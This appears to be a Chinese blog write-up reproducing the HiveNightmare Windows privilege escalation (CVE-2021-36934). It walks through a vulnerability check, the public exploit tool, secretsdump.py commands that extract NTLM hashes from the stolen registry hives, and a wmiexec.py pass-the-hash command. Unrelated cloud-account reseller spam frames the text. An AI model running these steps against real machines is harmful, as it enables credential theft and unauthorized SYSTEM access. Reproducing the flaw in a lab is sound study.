CVE-2021-36934提权复现

阿里云国内75折 回扣 微信号:monov8
阿里云国际,腾讯云国际,低至75折。AWS 93折 免费开户实名账号 代冲值 优惠多多 微信号:monov8 飞机:@monov6

CVE-2021-36934

2021年7 月 20 日微软确认了一个新的本地提权漏洞(CVE-2021-36934)被称为HiveNightmare。该漏洞由于Windows中多个系统文件的访问控制表(ACL)过于宽松使得任何标准用户都可以从系统卷影副本中读取包括SAM、SYSETM、SECURITY在内的多个系统文件。拿到这几个文件之后就可以进行本地破解拿到用户的NTLM hash进行PTH攻击或者直接本地爆破密码。

影响版本

  • Windows 10 Version 1809 以后的版本包括win11

  • 不影响 Windows Server 版本

漏洞利用条件

  • 系统保护开启(默认开启)

  • 系统中创建有还原点

系统保护在windows系统中默认启动因此如果已创建还原点那么标准用户可直接从卷影副本中访问SAM、SYSETM、SECURITY文件。这些文件路径如下

C:\Windows\System32\config\SAM
C:\Windows\System32\config\SYSTEM
C:\Windows\System32\config\SECURITY

漏洞复现

复现使用系统Win10 12900H登录账号为普通用户test

创建一个系统还原点

若系统中不曾创建过还原点那么后面导出哈希时ntlm哈希为31d6cfe0d16ae931b73c59d7e0c089c0即为空值

  1. 检测是否存在漏洞

以标准用户普通用户执行以下命令

icacls C:\Windows\System32\config\SAM

如果输出 BUILTIN\Users:(I)(RX) 表示该系统易受攻击如下

  1. 读取系统文件

EXP 地址为https://github.com/GossiTheDog/HiveNightmare

直接运行HiveNightmare.exe程序可以看到在低权限账号下成功利用 CVE-2021–36934 读取到了 SAM、SECURITY、SYSTEM 三个文件。

  1. 获取目标用户hash

在获得 SAM、SECURITY、SYSTEM 文件后我们就可以使用 secretsdump.py 获取目标用户的 hash了。

# python secretsdump.py -sam sam文件 -system system文件 -security security文件
python secretsdump.py -sam SAM-2023-01-30 -system SYSTEM-SAM-2023-01-30 -security SECURITY-2021-SAM-2023-01-30 LOCAL

得到用户的哈希值后可以对其进行暴力破解也可以直接使用本地管理员用户进行哈希传递从而获取system权限。由于是在同一台计算机进行哈希传递所以无需管理员关闭防火墙也能进行哈希传递

python wmiexec.py administrator@192.168.10.8 -hashes aad3b435b51404eeaad3b435b51404ee:4142ea6b86c97a94caf82f7bc9144814
阿里云国内75折 回扣 微信号:monov8
阿里云国际,腾讯云国际,低至75折。AWS 93折 免费开户实名账号 代冲值 优惠多多 微信号:monov8 飞机:@monov6